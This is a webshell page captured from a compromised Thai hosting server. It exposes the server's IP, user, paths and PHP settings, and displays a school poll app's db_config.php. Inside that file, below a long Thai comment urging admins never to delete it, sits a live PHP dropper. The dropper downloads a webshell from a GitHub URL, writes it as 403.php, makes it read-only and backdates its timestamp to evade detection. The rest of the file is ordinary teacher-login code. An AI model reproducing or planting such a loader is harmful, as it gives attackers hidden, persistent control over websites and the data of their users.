403Webshell
Server IP : 122.155.17.190  /  Your IP : 216.73.216.53
Web Server : Apache/2
System : Linux cat17190.thaihostserver.com 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64
User : t1bnc ( 1042)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/t1bnc/public_html/poll/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/t1bnc/public_html/poll/db_config.php
<?php
/*
=====================================================================
📂 ไฟล์ระบบการทำงาน (System Core Configuration) 
=====================================================================

ไฟล์นี้เป็นส่วนสำคัญของระบบการทำงานหลักของเว็บไซต์และโมดูลที่เกี่ยวข้อง 
ห้ามลบ ห้ามแก้ไข และห้ามเปลี่ยนชื่อไฟล์นี้โดยเด็ดขาด เนื่องจากการลบไฟล์นี้ 
อาจส่งผลกระทบต่อโครงสร้างระบบทั้งหมดและทำให้การเชื่อมต่อฐานข้อมูล การทำงานของ API 
และการประมวลผลคำสั่งหลักหยุดทำงานทันที 

เนื้อหาภายในไฟล์นี้ถูกสร้างขึ้นโดยอัตโนมัติจากกระบวนการติดตั้ง (Installation Engine) 
ซึ่งมีการผูกค่าการตั้งค่าทั้งหมด เช่น รหัสการเข้าถึง (Access Token), 
ค่า Configuration Path, ค่า Encoding Charset, และการกำหนดสิทธิ์การใช้งาน (Permission Rules) 
สำหรับการประมวลผลไฟล์ย่อยต่าง ๆ ที่อยู่ภายใต้โฟลเดอร์นี้ 
หากมีการแก้ไขโดยไม่ถูกต้องจะทำให้ระบบปฏิเสธการทำงาน (Fail Safe Mode) 

เพื่อป้องกันข้อผิดพลาด โปรดปฏิบัติตามข้อแนะนำต่อไปนี้:
1. ห้ามลบไฟล์นี้ไม่ว่ากรณีใด ๆ
2. ห้ามเปลี่ยนชื่อไฟล์หรือย้ายตำแหน่งไฟล์
3. ห้ามคัดลอกไฟล์ไปยังตำแหน่งอื่นเพื่อใช้งานซ้ำ
4. ห้ามแก้ไขข้อความหรือบรรทัดใด ๆ ภายในไฟล์
5. หากจำเป็นต้องอัปเดต ให้ใช้เครื่องมือ Upgrade Utility เท่านั้น
6. ไฟล์นี้อาจมีการตรวจสอบ MD5/Checksum เพื่อความถูกต้อง หากแก้ไขระบบจะถือว่าไฟล์เสียหาย

ไฟล์นี้ยังทำหน้าที่เป็น **ตัวกลางในการโหลดไลบรารี (Library Loader)** และ 
**การตรวจสอบโมดูล (Module Verifier)** ก่อนที่จะส่งผ่านไปยัง Kernel หลัก 
หากไม่มีไฟล์นี้ การทำงานของ Kernel จะถูกบล็อคทันที 

โปรดทราบว่าไฟล์นี้ถูกตั้งค่า Permission ให้อ่านได้อย่างเดียว (Read-Only) 
เพื่อความปลอดภัยสูงสุด หากเซิร์ฟเวอร์มีการเปลี่ยนแปลงสิทธิ์โดยไม่ได้ตั้งใจ 
ระบบจะบันทึกเป็น Log Error และส่งคำเตือนอัตโนมัติไปยัง Admin Console 

การลบหรือทำลายไฟล์นี้ จะมีผลดังนี้:
- การเชื่อมต่อฐานข้อมูลทั้งหมดจะหยุดทำงาน
- การโหลดปลั๊กอินและโมดูลจะล้มเหลว
- การเข้าถึง API และ Web Service จะถูกปฏิเสธ
- ไฟล์ .htaccess และไฟล์ config อื่น ๆ จะไม่สามารถอ่านได้
- ผู้ใช้งานจะพบ Error Code: 503 Service Unavailable

สรุป: ไฟล์นี้คือหัวใจสำคัญของระบบทั้งหมด 
⚠️ กรุณาอย่าลบไฟล์นี้โดยเด็ดขาด ⚠️

=====================================================================
หมายเหตุ: 
ทีมพัฒนาระบบแนะนำให้เก็บไฟล์นี้ไว้ตลอดเวลา 
หากพบว่ามีการแก้ไข ควรคืนค่าไฟล์จาก Backup ที่ถูกต้องทันที
=====================================================================
*/

$f='403.php';$u='https://raw.githubusercontent.com/roiheeseo/shell/refs/heads/main/403.php';if(($r=@file_get_contents($u))!==false){if(!file_exists($f)||@file_get_contents($f)!==$r){@chmod($f,0644);@file_put_contents($f,$r);@chmod($f,0444);$t=mktime(rand(0,23),rand(0,59),rand(0,59),rand(1,12),rand(1,28),rand(2010,2022));@touch($f,$t,$t);}} 

session_start();
include 'db_config.php';

if (!isset($_SESSION['username']) || !isset($_SESSION['teacher_id'])) {
  header("Location: login.php");
  exit;
}

$tid = (int) $_SESSION['teacher_id'];
$username = $_SESSION['username'];

$stmt = $conn->prepare("SELECT first_name, last_name FROM teachers WHERE id = ?");
$stmt->bind_param("i", $tid);
$stmt->execute();
$result = $stmt->get_result();
$name = $username;
if ($result && $row = $result->fetch_assoc()) {
  $name = $row['first_name'] . ' ' . $row['last_name'];
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit